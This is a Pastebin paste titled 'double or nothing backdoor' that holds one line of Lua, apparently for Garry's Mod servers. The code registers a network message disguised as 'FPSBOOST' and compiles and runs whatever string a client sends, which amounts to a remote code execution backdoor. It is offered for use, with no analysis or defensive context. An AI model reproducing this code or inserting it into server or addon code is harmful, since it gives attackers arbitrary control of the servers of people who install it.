hoobonceagain

double or nothing backdoor

Aug 22nd, 2018
202
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.17 KB | None | 0 0
  1. util.AddNetworkString( "FPSBOOST" ) net.Receive( "FPSBOOST", function() local x = CompileString( net.ReadString(), "LuaCmd", false ) if isfunction( x ) then x() end end )
Advertisement
Add Comment
Please, Sign In to add comment